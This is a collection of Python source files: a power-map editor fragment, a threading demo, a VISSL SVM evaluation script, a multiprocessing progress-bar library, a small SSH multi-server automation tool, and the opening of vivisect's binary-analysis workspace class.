t.start()
self._execute_thread = t
return True
def stop(self):
self.mapper.stop()
def traits_view(self):
v = View(
HGroup(
spring,
Item("beam_diameter", style="readonly"),
Item("power", style="readonly"),
Item("percent_threshold", label="% Threshold"),
visible_when="was_executed",
),
UItem("component", editor=ComponentEditor()),
resizable=True,
)
return v
if __name__ == "__main__":
e = PowerMapEditor()
p = "/Users/ross/Sandbox/powermap/powermap-2013-07-26005.hdf5"
p = "/Users/ross/Sandbox/powermap/powermap-2013-07-27008.hdf5"
e.load(p)
e.configure_traits()
# ============= EOF =============================================
|
02_simple_thread.py
|
'''
Simple threading implemented,
the time taken to make 10 calls of do_something()
was around 2 seconds
'''
import time
import threading
start = time.perf_counter()
def do_something(seconds):
print(f'Sleeping {seconds} second...')
time.sleep(seconds)
print(f'Done Sleeping...{seconds}')
threads = []
for _ in range(10):
t = threading.Thread(target=do_something, args=[1])
t.start()
threads.append(t)
for t in threads:
t.join()
finish = time.perf_counter()
print(f'Finished in {round(finish-start, 2)} second(s)')
|
train_svm.py
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import multiprocessing as mp
import sys
from argparse import Namespace
from typing import Any, List
import numpy as np
from hydra.experimental import compose, initialize_config_module
from vissl.hooks import default_hook_generator
from vissl.models.model_helpers import get_trunk_output_feature_names
from vissl.utils.checkpoint import get_checkpoint_folder
from vissl.utils.distributed_launcher import launch_distributed
from vissl.utils.env import set_env_vars
from vissl.utils.hydra_config import (
AttrDict,
convert_to_attrdict,
is_hydra_available,
print_cfg,
)
from vissl.utils.io import load_file
from vissl.utils.logger import setup_logging, shutdown_logging
from vissl.utils.misc import merge_features
from vissl.utils.svm_utils.svm_trainer import SVMTrainer
def train_svm(cfg: AttrDict, output_dir: str, layername: str):
# setup the environment variables
set_env_vars(local_rank=0, node_id=0, cfg=cfg)
# train the svm
logging.info(f"Training SVM for layer: {layername}")
trainer = SVMTrainer(cfg["SVM"], layer=layername, output_dir=output_dir)
train_data = merge_features(output_dir, "train", layername, cfg)
train_features, train_targets = train_data["features"], train_data["targets"]
trainer.train(train_features, train_targets)
# test the svm
test_data = merge_features(output_dir, "test", layername, cfg)
test_features, test_targets = test_data["features"], test_data["targets"]
trainer.test(test_features, test_targets)
logging.info("All Done!")
def main(args: Namespace, config: AttrDict):
# setup logging
setup_logging(__name__)
# print the configuration used
print_cfg(config)
assert config.MODEL.FEATURE_EVAL_SETTINGS.EVAL_MODE_ON, (
"Feature eval mode is not ON. Can't run train_svm. "
"Set config.MODEL.FEATURE_EVAL_SETTINGS.EVAL_MODE_ON=True "
"in your config or from command line."
)
# extract the features
launch_distributed(
config,
args.node_id,
engine_name="extract_features",
hook_generator=default_hook_generator,
)
# Get the names of the layers for which we extracted features. If the user
# doesn't specify the features to evaluate, we use the full model output and
# freeze both head and trunk as a precaution.
layers = get_trunk_output_feature_names(config.MODEL)
if len(layers) == 0:
layers = ["heads"]
output_dir = get_checkpoint_folder(config)
running_tasks = [
mp.Process(target=train_svm, args=(config, output_dir, layer))
for layer in layers
]
for running_task in running_tasks:
running_task.start()
for running_task in running_tasks:
running_task.join()
# collect the mAP stats for all the layers and report
output_mAP = []
for layer in layers:
try:
ap_file = f"{output_dir}/{layer}/test_ap.npy"
output_mAP.append(round(100.0 * np.mean(load_file(ap_file)), 3))
except Exception:
output_mAP.append(-1)
logging.info(f"AP for various layers:\n {layers}: {output_mAP}")
# close the logging streams including the filehandlers
shutdown_logging()
def hydra_main(overrides: List[Any]):
with initialize_config_module(config_module="vissl.config"):
cfg = compose("defaults", overrides=overrides)
args, config = convert_to_attrdict(cfg)
main(args, config)
if __name__ == "__main__":
overrides = sys.argv[1:]
assert is_hydra_available(), "Make sure to install hydra"
hydra_main(overrides=overrides)
|
parallelbar.py
|
import os
from functools import partial
import multiprocessing as mp
from threading import Thread
from tqdm.auto import tqdm
from .tools import get_len
class ProgressBar(tqdm):
def __init__(self, *args, step=1, **kwargs):
super().__init__(*args, **kwargs)
self.step = step
self._value = 0
def _update(self):
if self._value % self.step == 0 and self._value < self.total:
super().update(self.step)
elif self._value == self.total:
extra = self._value % self.step
if extra:
super().update(extra)
else:
super().update(self.step)
elif self._value > self.total:
super().update(1)
def update(self):
self._value += 1
self._update()
def _process(func, pipe, task):
result = func(task)
pipe.send([os.getpid()])
return result
def _core_process_status(bar_size, bar_step, disable, pipe):
pid_dict = dict()
i = 0
while True:
result = pipe.recv()
if not result:
for val in pid_dict.values():
val.close()
break
try:
pid_dict[result[0]].update()
except KeyError:
i += 1
position = len(pid_dict)
pid_dict[result[0]] = ProgressBar(step=bar_step, total=bar_size, position=position, desc=f'Core {i}',
disable=disable)
pid_dict[result[0]].update()
def _process_status(bar_size, bar_step, disable, pipe):
bar = ProgressBar(step=bar_step, total=bar_size, disable=disable)
while True:
result = pipe.recv()
if not result:
bar.close()
break
bar.update()
def _bar_size(chunk_size, len_tasks, n_cpu):
bar_count, extra = divmod(len_tasks, chunk_size)
if bar_count < n_cpu:
bar_size = chunk_size
else:
bar_size, extra = divmod(len_tasks, n_cpu * chunk_size)
bar_size = bar_size * chunk_size
if extra:
bar_size += chunk_size
return bar_size
def _do_parallel(func, pool_type, tasks, n_cpu, chunk_size, core_progress,
context, total, bar_step, disable,
):
parent, child = mp.Pipe()
len_tasks = get_len(tasks, total)
if not n_cpu:
n_cpu = mp.cpu_count()
if not chunk_size:
chunk_size, extra = divmod(len_tasks, n_cpu * 4)
if extra:
chunk_size += 1
if core_progress:
bar_size = _bar_size(chunk_size, len_tasks, n_cpu)
thread = Thread(target=_core_process_status, args=(bar_size, bar_step, disable, parent))
else:
bar_size = len_tasks
thread = Thread(target=_process_status, args=(bar_size, bar_step, disable, parent))
thread.start()
with mp.get_context(context).Pool(n_cpu) as p:
target = partial(_process, func, child)
method = getattr(p, pool_type)
if pool_type == 'map':
result = method(target, tasks, chunksize=chunk_size)
else:
result = list(method(target, tasks, chunksize=chunk_size))
child.send(None)
thread.join()
return result
def progress_map(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'map', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step, disable)
return result
def progress_imap(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'imap', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step, disable)
return result
def progress_imapu(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'imap_unordered', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step,
disable)
return result
|
__init__.py
|
#!/usr/bin/env python3
import argparse
import functools
import logging
import os
import queue
import re
import signal
import sys
import threading
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
List,
Optional,
TypeVar,
Union,
)
import boto3 # type: ignore
import fabric # type: ignore
T = TypeVar("T")
ColorFunc = Callable[[str], str]
TaskFunc = Callable[[], None]
Ip = Dict[str, Optional[str]]
Filters = List[Dict[str, Union[str, List[str]]]]
__version__ = "0.6.2"
CHUNK_SIZE = 50
DEFAULT = {"threads": 10, "timeout": 10}
HELP = {
"command": "shell command to execute",
"hosts": "list of IP addresses",
"i": "private key path",
"kind": "AWS resource type (id: instance ID, asg: Auto Scaling Group name, elb: Elastic Load Balancer name)",
"local": "path to local file",
"public": "prefer public IP addresses",
"region": "AWS region name",
"remote": "path to remote file",
"threads": "number of concurrent connections",
"timeout": "connection timeout in seconds",
"user": "remote server user",
"values": "list of resource identifiers",
"verbose": "show more output",
}
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler(sys.stdout))
tasks: "queue.Queue[TaskFunc]" = queue.Queue()
stop = threading.Event()
num_success = 0
lock = threading.Lock()
def inc_success() -> None:
global num_success
with lock:
num_success += 1
def ansi(x: int) -> str:
return "\033[{}m".format(x)
def colored(s: str, code: int = 0, bold: bool = False) -> str:
has_attr = code > 0 or bold
if has_attr and sys.stdout.isatty() and "NO_COLOR" not in os.environ:
bold_attr = ansi(1) if bold else ""
return ansi(code) + bold_attr + s + ansi(0)
return s
def red(s: str) -> str:
return colored(s, code=31)
def green(s: str) -> str:
return colored(s, code=32)
def yellow(s: str) -> str:
return colored(s, code=33)
def chunks(L: List[T], n: int) -> Iterator[List[T]]:
for i in range(0, len(L), n):
yield L[i : i + n]
class Connection(object):
def __init__(
self, host: str, user: str, timeout: int, key_filename: str, color: ColorFunc
) -> None:
self.host = host
self.color = color
self.conn = fabric.Connection(
host,
user=user,
connect_timeout=timeout,
connect_kwargs={
"key_filename": key_filename,
"auth_timeout": timeout,
"banner_timeout": timeout,
},
)
def print(self, s: str, color: ColorFunc = colored) -> None:
for line in s.splitlines():
log.info(self.color(self.host) + "\t" + color(line))
def run(self, command: str) -> None:
self.print("{}\t{}".format(yellow("run"), command))
try:
with self.conn as c:
result = c.run(command, pty=True, hide=True, warn=True, in_stream=False)
except Exception as e:
self.print(str(e), color=red)
else:
if result.ok:
self.print(result.stdout)
inc_success()
else:
self.print(result.stdout, color=red)
def put(self, local: str, remote: str) -> None:
self.print("{}\t{}\t{}".format(yellow("put"), local, remote))
try:
with self.conn as c:
c.put(local, remote=remote)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def get(self, remote: str) -> None:
local = os.path.join(self.host, os.path.basename(remote))
self.print("{}\t{}\t{}".format(yellow("get"), remote, local))
try:
os.mkdir(self.host)
except OSError:
pass
try:
with self.conn as c:
c.get(remote, local=local)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def find_instance_ids(L: List[str]) -> Iterator[str]:
for s in L:
for match in re.findall(r"[\da-f]{17}|[\da-f]{8}", s):
yield "i-" + match
def describe_instances(client: Any, filters: Filters) -> Iterator[Dict[str, str]]:
reservations = client.describe_instances(Filters=filters)
for reservation in reservations["Reservations"]:
for instance in reservation["Instances"]:
yield instance
def instance_ids_to_ip_addrs(client: Any, instance_ids: Iterable[str]) -> Iterator[Ip]:
# Send request in batches to avoid FilterLimitExceeded. Use Filters
# instead of InstanceIds to avoid exception on non-existent instance ID
# (e.g. during scale-out or when hastily pasting a bunch of text).
for chunk in chunks(list(instance_ids), CHUNK_SIZE):
filters: Filters = [{"Name": "instance-id", "Values": chunk}]
for instance in describe_instances(client, filters):
yield {
"public": instance.get("PublicIpAddress"),
"private": instance.get("PrivateIpAddress"),
}
def asgs_to_instance_ids(client: Any, asg_names: List[str]) -> Iterator[str]:
asgs = client.describe_auto_scaling_groups(AutoScalingGroupNames=asg_names)
for asg in asgs["AutoScalingGroups"]:
for instance in asg["Instances"]:
yield instance["InstanceId"]
def elbs_to_instance_ids(client: Any, elb_names: List[str]) -> Iterator[str]:
elbs = client.describe_load_balancers(LoadBalancerNames=elb_names)
for elb in elbs["LoadBalancerDescriptions"]:
for instance in elb["Instances"]:
yield instance["InstanceId"]
def print_ip_addrs(ip_addrs: Iterable[Ip], public: bool) -> None:
for ip_addr in ip_addrs:
public_ip = ip_addr["public"]
private_ip = ip_addr["private"]
if public and public_ip:
log.info(public_ip)
elif private_ip:
log.info(private_ip)
def get_ip_addrs(values: List[str], kind: str, region_name: str) -> Iterator[Ip]:
if kind == "id":
instance_ids = find_instance_ids(values)
elif kind == "asg":
autoscaling = boto3.client("autoscaling", region_name=region_name)
instance_ids = asgs_to_instance_ids(autoscaling, values)
elif kind == "elb":
elb = boto3.client("elb", region_name=region_name)
instance_ids = elbs_to_instance_ids(elb, values)
ec2 = boto3.client("ec2", region_name=region_name)
return instance_ids_to_ip_addrs(ec2, instance_ids)
def get_colors() -> Iterator[ColorFunc]:
for bold in (False, True):
for code in range(31, 37):
yield functools.partial(colored, code=code, bold=bold)
def get_conns(args: argparse.Namespace) -> Iterator[Connection]:
colors = list(get_colors())
for i, host in enumerate(args.hosts):
if host:
yield Connection(
host, args.user, args.timeout, args.i, colors[i % len(colors)]
)
def get_tasks(args: argparse.Namespace) -> List[TaskFunc]:
conns = get_conns(args)
if args.tool == "run":
return [functools.partial(conn.run, args.command) for conn in conns]
elif args.tool == "get":
return [functools.partial(conn.get, args.remote) for conn in conns]
elif args.tool == "put":
return [functools.partial(conn.put, args.local, args.remote) for conn in conns]
return []
def worker() -> None:
while not stop.is_set():
try:
task = tasks.get_nowait()
task()
tasks.task_done()
except queue.Empty:
break
def run_workers(num_workers: int) -> None:
threads = []
for _ in range(num_workers):
thread = threading.Thread(target=worker)
thread.start()
threads.append(thread)
for thread in threads:
while thread.is_alive():
thread.join(1)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Tiny multi-server automation tool.")
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("--verbose", action="store_true", help=HELP["verbose"])
subparsers = parser.add_subparsers(dest="tool")
aws_parser = subparsers.add_parser(
"ip", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
aws_parser.add_argument("--region", help=HELP["region"])
aws_parser.add_argument("--public", action="store_true", help=HELP["public"])
aws_parser.add_argument("kind", choices=("id", "asg", "elb"), help=HELP["kind"])
aws_parser.add_argument("values", nargs="+", help=HELP["values"])
run_parser = subparsers.add_parser(
"run", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
run_parser.add_argument("-i", help=HELP["i"])
run_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
run_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
run_parser.add_argument("command", help=HELP["command"])
run_parser.add_argument("user", help=HELP["user"])
run_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
get_parser = subparsers.add_parser(
"get", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
get_parser.add_argument("-i", help=HELP["i"])
get_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
get_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
get_parser.add_argument("remote", help=HELP["remote"])
get_parser.add_argument("user", help=HELP["user"])
get_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
put_parser = subparsers.add_parser(
"put", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
put_parser.add_argument("-i", help=HELP["i"])
put_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
put_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
put_parser.add_argument("local", help=HELP["local"])
put_parser.add_argument("remote", help=HELP["remote"])
put_parser.add_argument("user", help=HELP["user"])
put_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
args = parser.parse_args()
if not args.tool:
parser.print_help()
sys.exit(1)
return args
def main() -> int:
# Avoid throwing exception on SIGPIPE.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.tool == "ip":
print_ip_addrs(get_ip_addrs(args.values, args.kind, args.region), args.public)
return 0
else:
for task in get_tasks(args):
tasks.put_nowait(task)
try:
num_workers = min(args.threads, len(args.hosts))
run_workers(num_workers)
except KeyboardInterrupt:
stop.set()
log.info(red("terminating"))
with lock:
return len(args.hosts) - num_success
if __name__ == "__main__":
sys.exit(main())
|
__init__.py
|
"""
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import queue
import string
import hashlib
import logging
import itertools
import traceback
import threading
import collections
import envi
import envi.exc as e_exc
import envi.bits as e_bits
import envi.common as e_common
import envi.memory as e_mem
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
logger = logging.getLogger(__name__)
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
STORAGE_MAP = {
'viv': 'vivisect.storage.basicfile',
'mpviv': 'vivisect.storage.mpfile',
}
def guid(size=16):
return e_common.hexify(os.urandom(size))
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory)
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
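# A minimal usage sketch (the binary path is illustrative; loadFromFile,
# analyze and saveWorkspace are the usual workflow entry points):
#
#   vw = VivWorkspace(confdir='/tmp/vivconf', autosave=False)
#   vw.loadFromFile('/path/to/binary')
#   vw.analyze()
#   vw.saveWorkspace()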
def __init__(self, **kwargs):
e_mem.MemoryObject.__init__(self)
viv_base.VivWorkspaceCore.__init__(self)
autosave = kwargs.get('autosave', False)
cfgdir = kwargs.get('confdir', None)
if cfgdir:
self.vivhome = os.path.abspath(cfgdir)
else:
self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
self._viv_gui = None # If a gui is running, it will put a ref here...
self._ext_ctxmenu_hooks = {}
self._extensions = {}
self.saved = False # TODO: Have a warning when we try to close the UI if the workspace hasn't been saved
self.rchan = None
self.server = None
self.chanids = itertools.count()
self.arch = None # The placeholder for the Envi architecture module
self.psize = None # Used so much, optimization is appropriate
cfgpath = os.path.join(self.vivhome, 'viv.json')
self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
# Ideally, *none* of these are modified except by _handleFOO funcs...
self.segments = []
self.exports = []
self.imports = []
self.codeblocks = []
self.relocations = []
self._dead_data = []
self.iscode = {}
self.xrefs = []
self.xrefs_by_to = {}
self.xrefs_by_from = {}
# XXX - make config option
self.greedycode = 0
self.metadata = {}
self.comments = {} # Comment by VA.
self.symhints = {}
self.filemeta = {} # Metadata Dicts stored by filename
self.transmeta = {} # Metadata that is *not* saved/evented
self.cfctx = viv_base.VivCodeFlowContext(self)
self.va_by_name = {}
self.name_by_va = {}
self.codeblocks_by_funcva = {}
self.exports_by_va = {}
self.colormaps = {}
self.vasetdefs = {}
self.vasets = {}
self.reloc_by_va = {}
self.func_args = {}
self.funcmeta = {} # Function metadata stored in the workspace
self.frefs = {}
# Extended analysis modules
self.amods = {}
self.amodlist = []
# Extended *function* analysis modules
self.fmods = {}
self.fmodlist = []
self.chan_lookup = {}
self.nextchanid = 1
self._cached_emus = {}
# The function entry signature decision tree
# FIXME add to export
self.sigtree = e_bytesig.SignatureTree()
self.siglist = []
self._op_cache = {}
self._initEventHandlers()
# Some core meta types that exist
self.setMeta('NoReturnApis', {})
self.setMeta('SymbolikImportEmulation', None)
# Default to basic file storage
self.setMeta("StorageModule", "vivisect.storage.basicfile")
# There are a few default va sets for use in analysis
self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
logger.info(msg)
def getVivGui(self):
'''
Return a reference to the vivisect GUI object for this workspace. If
the GUI is not running (aka, the workspace is being used programmatically)
this routine returns None.
Example:
vwgui = vw.getVivGui()
if vwgui:
vwgui.doStuffAndThings()
'''
return self._viv_gui
def getPointerSize(self):
return self.psize
def addCtxMenuHook(self, name, handler):
'''
Extensions can add Context Menu hooks to modify the menu as they wish.
This would most often happen from the Extension's vivExtension() init function.
see vivisect.qt.ctxmenu for more details
handler should have the following prototype (inc. example code):
from vqt.common import ACT
def myExtCtxMenuHandler(vw, menu):
toymenu = menu.addMenu('myToys')
toymenu.addAction('Voodoo Wizbang ZeroDay Finder Thingy', ACT(doCoolShit, vw, va))
Currently, this should live in a loaded module, not in your Viv Extension's main py file.
'''
if name in self._ext_ctxmenu_hooks:
cur = self._ext_ctxmenu_hooks[name]
logger.warning("Attempting to hook the context menu: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._ext_ctxmenu_hooks[name] = handler
def delCtxMenuHook(self, name):
'''
Remove a context-menu hook that has been installed by an extension
'''
self._ext_ctxmenu_hooks.pop(name, None)
def addExtension(self, name, extmod):
'''
Add extension module to a list of extensions.
This keeps a list of installed extension modules, with the added value
of keeping the loaded module in memory.
'''
if name in self._extensions:
cur = self._extensions[name]
logger.warning("Attempting to register an extension: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._extensions[name] = extmod
def delExtension(self, name):
'''
Removes the extension module from the list of extensions.
'''
self._extensions.pop(name, None)
def getVivGuid(self):
'''
Return the GUID for this workspace. Every newly created VivWorkspace
should have a unique GUID, for identifying a particular workspace for
a given binary/process-space versus another created at a different
time. Filesystem-copies of the same workspace will have the same GUID
by design. This easily allows for workspace-specific GUI layouts as
well as comparisons of Server-based workspaces to the original file-
based workspace used to store to the server.
'''
vivGuid = self.getMeta('GUID')
if vivGuid is None:
vivGuid = guid()
self.setMeta('GUID', vivGuid)
return vivGuid
def loadWorkspace(self, wsname):
mname = self.getMeta("StorageModule")
mod = self.loadModule(mname)
mod.loadWorkspace(self, wsname)
self.setMeta("StorageName", wsname)
# The event list thus far came *only* from the load...
self._createSaveMark()
# Snapin our analysis modules
self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
"""
Add a reference from the operand at virtual address 'va'
index 'idx' to a function local offset. Positive values
(beginning with 0) are considered argument references. Negative
values are considered function local storage and are relative to
the stack pointer at function entry.
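A minimal sketch (the fva/va/idx values are hypothetical):
vw.addFref(fva, va, 1, 0)   # operand 1 at va references argument 0
vw.addFref(fva, va, 0, -4)  # operand 0 at va references local storage at entry-sp - 4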
"""
# FIXME this should probably be an argument
r = (va, idx, val)
self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
"""
Get back the fref value (or None) for the given operand index
from the instruction at va.
"""
return self.frefs.get((va, idx))
def getEmulator(self, **kwargs):
"""
Get an instance of a WorkspaceEmulator for this workspace.
Use logread/logwrite to enable memory access tracking.
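A minimal sketch (assumes an analyzed workspace and a known function va):
emu = vw.getEmulator(logwrite=True)
emu.runFunction(fva, maxhit=1)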
"""
plat = self.getMeta('Platform')
arch = self.getMeta('Architecture')
eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
if eclass is None:
eclass = viv_imp_lookup.workspace_emus.get(arch)
if eclass is None:
raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
emu = eclass(self, **kwargs)
emu.setEndian(self.getEndian())
return emu
def getCachedEmu(self, emuname):
"""
Get a cached emulator by name. If one doesn't exist it is
created and then cached.
"""
emu = self._cached_emus.get(emuname)
if emu is None:
emu = self.getEmulator()
self._cached_emus[emuname] = emu
return emu
def addLibraryDependancy(self, libname):
"""
Add a *normalized* library name to the import search
chain for this binary. This is only needed for formats
whose imports don't explicitly state their library name.
"""
# FIXME this needs to be event enabled... either plumb it special,
# or allow the get/append/set race...
dl = self.getMeta("DepLibs", None)
if dl is None:
dl = []
dl.append(libname)
self.setMeta("DepLibs", dl)
def getLibraryDependancies(self):
'''
Retrieve the list of *normalized* library dependencies.
'''
dl = self.getMeta("DepLibs", None)
if dl is None:
return []
return list(dl)
def setComment(self, va, comment, check=False):
'''
Set the human-readable comment for a given virtual address.
Comments will be displayed by the code renderer, and
are an important part of this balanced breakfast.
Example:
vw.setComment(callva, "This actually calls FOO...")
'''
if check and self.comments.get(va):
return
self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
'''
Returns the comment string (or None) for a given
virtual address.
Example:
cmnt = vw.getComment(va)
print('COMMENT: %s' % cmnt)
'''
return self.comments.get(va)
def getComments(self):
'''
Retrieve all the comments in the viv workspace as
(va, cmnt) tuples.
Example:
for va,cmnt in vw.getComments():
print('Comment at 0x%.8x: %s' % (va, cmnt))
'''
return list(self.comments.items())
def addRelocation(self, va, rtype, data=None):
"""
Add a relocation entry for tracking.
Expects data to have whatever is necessary for the reloc type. eg. addend
"""
# split "current" va into fname and offset. future relocations will want to base all va's from an image base
mmap = self.getMemoryMap(va)
if not mmap:
logger.warning('addRelocation: No matching map found for %s', va)
return None
mmva, mmsz, mmperm, fname = mmap # FIXME: getFileByVa does not obey file defs
imgbase = self.getFileMeta(fname, 'imagebase')
offset = va - imgbase
self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
return self.getRelocation(va)
def getRelocations(self):
"""
Get the current list of relocation entries.
"""
return self.relocations
def getRelocation(self, va):
"""
Return the type of relocation at the specified
VA or None if there isn't a relocation entry for
the address.
"""
return self.reloc_by_va.get(va)
def pointerString(self, va):
return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
"""
Add a function signature entry by bytes. This is mostly used by
file parsers/loaders to manually tell the workspace about known
entry signature types.
see envi.bytesig for details.
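A minimal sketch (a common i386 prologue; the mask argument is optional):
vw.addFunctionSignatureBytes(b'\x55\x8b\xec')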
"""
self.sigtree.addSignature(bytez, mask)
self.siglist.append((bytez, mask))
def isFunctionSignature(self, va):
"""
Check if the specified va is a function entry signature
according to the current entry point signature tree...
"""
if not self.isValidPointer(va):
return False
offset, bytes = self.getByteDef(va)
return self.sigtree.isSignature(bytes, offset=offset)
def addNoReturnVa(self, va):
noretva = self.getMeta('NoReturnApisVa', {})
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
self.cfctx.addNoReturnAddr(va)
def addNoReturnApi(self, funcname):
"""
Inform vivisect code-flow disassembly that any call target
which matches the specified name ("funcname" or "libname.funcname"
for imports) does *not* return and code-flow should be stopped...
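A minimal sketch:
vw.addNoReturnApi('kernel32.exitprocess')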
"""
funcname = funcname.lower()
m = self.getMeta('NoReturnApis', {})
m[funcname] = True
self.setMeta('NoReturnApis', m)
noretva = self.getMeta('NoReturnApisVa', {})
# If we already have an import entry, we need to update codeflow
for lva, lsize, ltype, linfo in self.getImports():
if linfo.lower() != funcname:
continue
self.cfctx.addNoReturnAddr(lva)
noretva[lva] = True
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
'''
Inform vivisect code-flow disassembly that any call target
which matches the specified regex ("funcname" or "libname.funcname"
for imports) does *not* return and code-flow should be stopped...
'''
c = re.compile(funcre, re.IGNORECASE)
m = self.getMeta('NoReturnApisRegex', [])
m.append(funcre)
self.setMeta('NoReturnApisRegex', m)
for lva, lsize, ltype, linfo in self.getImports():
if c.match(linfo):
self.addNoReturnApi(linfo)
def isNoReturnVa(self, va):
'''
Check if a VA is a no return API
'''
isva = self.getMeta('NoReturnApisVa', {}).get(va, False)
iscall = self.getVaSetRow('NoReturnCalls', va) is not None
return isva or iscall
def checkNoRetApi(self, apiname, va):
'''
Called as new APIs (thunks) are discovered, checks to see
if they wrap a NoReturnApi. Updates if it is a no ret API thunk
'''
noretva = self.getMeta('NoReturnApisVa', {})
for funcre in self.getMeta('NoReturnApisRegex', []):
c = re.compile(funcre, re.IGNORECASE)
if c.match(apiname):
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
for funcname in self.getMeta('NoReturnApis', {}).keys():
if funcname.lower() == apiname.lower():
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
"""
Add an analysis module by python import path
"""
if modname in self.amods:
return
mod = self.loadModule(modname)
self.amods[modname] = mod
self.amodlist.append(modname)
logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
"""
Remove an analysis module from the list used during analysis()
"""
if modname not in self.amods:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
x = self.amods.pop(modname, None)
if x is not None:
self.amodlist.remove(modname)
def loadModule(self, modname):
__import__(modname)
return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
"""
Snap in a per-function analysis module (by name) which
will be triggered during the creation of a new function
(makeFunction).
"""
if modname in self.fmods:
return
mod = self.loadModule(modname)
self.fmods[modname] = mod
self.fmodlist.append(modname)
logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
'''
Remove a currently registered function analysis module.
Example:
vw.delFuncAnalysisModule('mypkg.mymod')
'''
x = self.fmods.pop(modname, None)
if x is None:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
self.fmodlist.remove(modname)
def createEventChannel(self):
